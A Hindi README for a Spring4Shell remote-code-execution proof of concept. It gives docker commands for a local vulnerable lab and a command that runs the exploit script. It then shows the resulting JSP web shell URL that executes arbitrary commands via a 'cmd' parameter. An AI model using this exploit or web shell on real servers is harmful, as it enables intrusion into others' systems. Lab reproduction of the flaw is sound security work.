
एक और spring4shell (Spring core RCE) POC
यह भेद्यता Spring Core को प्रभावित करती है और एक हमलावर को लाइब्रेरी के HTTP अनुरोध पार्सर में सुरक्षा को बायपास करने के लिए विशेष रूप से तैयार किया गया HTTP अनुरोध भेजने की अनुमति देती है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।
अधिक जानकारी यहां

इस भेद्यता का शोषण करने के लिए, कई शर्तों को पूरा करना होगा:
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
अपेक्षित प्रतिक्रिया
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
यदि आप इस url तक पहुँचते हैं, तो यह आपकी इच्छित कमांड चलाएगा cmd=<whatyouwant>

यदि आप कंटेनर में ssh करते हैं तो आप देखेंगे कि एक नई फ़ाइल बनाई गई है tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT